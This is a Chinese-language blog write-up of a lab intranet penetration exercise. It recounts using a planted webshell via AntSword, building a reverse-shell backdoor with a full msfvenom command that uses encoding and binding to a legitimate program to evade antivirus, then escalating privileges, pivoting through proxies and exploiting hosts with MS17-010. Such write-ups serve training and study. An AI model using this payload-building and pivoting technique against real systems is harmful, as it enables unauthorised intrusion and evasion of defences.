内网渗透(蚁剑+MSF)

江枫思渺然 提交于 2020-01-14 11:05:26

0x01 192.168.2.244攻击

(1)使用的是之前本科实验室的同学在192.168.2.244/bigdata上留的一句话木马

 

 

 

(2)因为本人技术有限,只能采用上传后门的方式来拿到shell,好在蚁剑足已满足我上传木马的需求。在这一步只需要使用msf生成木马(使用theFatRat生成的木马稳定性不怎么滴,而且不能绕过火绒)。最后产生的木马效果最好如下:

msf>msfvenom -p windows/shell_reverse_tcp LHOST=192.168.4.215 LPORT=6227 -e x86/shikata_ga_nai -x IPradar5.exe -i 5 -f exe -o /root/Desktop/backdoor.exe

-e x86/shikata_ga_nai 此步意为使用shikata_ga_nai的编码方式对攻击载荷进行重新编码,上文有讲

-x IPradar5.exe 此步意为将木马捆绑在指定的可执行程序模版上,此处为IPradar5.exe

-i 5 此处意为使用刚才设定的编码方式对目标进行5次编码(多次编码理论上来讲有助于免杀,但是也不一定,毕竟杀软不是白收费的,免杀技术飞速发展,新的免杀技术一出现就会被各大安全厂商盯上的。。。。)

-f exe 此步意为指定MSF编码器输出格式为exe

-o /root/Desktop/backdoor.exe 此步意为指定处理完毕后的文件输出路径

本人自己写了个exe程序来替代IPradar5.exe。能维持住运行就ok。其他的就和该模板一样了。

3)使用蚁剑传大马

 

 

 

其中halo.exe的免杀与稳定性最好。同时使用该代码的时候需要注意如果防御方管理员在线,则会直接关掉你的木马,因此还需对其进行改进,但目前阶段来说足够了。

 

0x02 跳板机布置

在上一阶段,我们拿到了反弹回来的244shell,这时后渗透阶段神器meterpreter就要上线了。

第一步提权,从mysql的数据库管理员上升到系统权限

 

第二步 建立路由

 

第三步,设代理

 

 

 

第四步,proxychainsnmap扫描

 

在设代理这里总会有一些问题,设置完本地走session的代理之后也不能全局使用proxychains来打。

0x03 攻击三网段

(1)首先使用ms17_010的扫描模块

 

在这里有9,20,23,43这三台主机上存在漏洞。我们开始一台一台来试

(2)展开攻击

 

这里打3.9的时候看到有报错,就很烦。之前connection reset by peer报错在百度上搜索之后拘束和TCP协议的三次握手有关系,有可能是网速过慢或其他原因。

 

在这里,运气爆棚!!!之前打192.168.3.43总会有connection报错,不过这次会话最终也没有维持太久。在给一位老哥看环境的时候就无情地断掉了。(不过跳转两个会话地路由看着还是真的舒服)

0x04 boss

 

 

 

之后果断接着对1.4的日志服务器逮着445一把梭,最后失败.....这也是我目前为止走的最远的一次了。

0xXX 后记

在本次整体的攻击过程中,见到了多位大佬的神操作。比如3h大佬的爆破密码技术和修改注册表绕过不允许空密码用户远程登陆,还有久哥使用ms17_command来实现任意代码执行。同样还见识到Cobalt Strike该渗透工具的强大。日后也准备自己租个公网服务器搭上一个。最后,虽然本次攻击实验 一边渗透,一边运维,晚上有时候还要值夜班为大佬们保证环境的稳定。但是,每一次成功弹回来shell的时候,每一次在熟悉的meterpreter出现在眼前的时候,就会发现这一切都是值得的。

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!